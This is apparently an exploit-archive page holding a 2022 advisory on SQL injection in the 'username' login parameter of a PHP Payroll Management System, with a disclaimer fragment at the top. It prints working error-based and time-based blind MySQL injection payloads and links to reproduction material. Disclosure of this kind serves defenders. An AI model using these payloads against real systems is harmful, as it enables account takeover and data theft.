databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: Payroll Management System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 04.03.2022<br />## Vendor: https://www.sourcecodester.com/user/257130/activity<br />## Software: https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Payroll-Management-System<br /><br />## Description:<br />The `username` parameter appears to be vulnerable to SQL injection attacks.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take administrator account control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: username (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: username=qkdmZlGW' AND (SELECT 3371 FROM(SELECT<br />COUNT(*),CONCAT(0x716b707871,(SELECT<br />(ELT(3371=3371,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VIhP&password=s0N!s2u!A6'<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=qkdmZlGW' AND (SELECT 9476 FROM<br />(SELECT(SLEEP(5)))NodP)-- Xiww&password=s0N!s2u!A6'<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Payroll-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/aj8bcv)<br /><br /><br /></code></pre>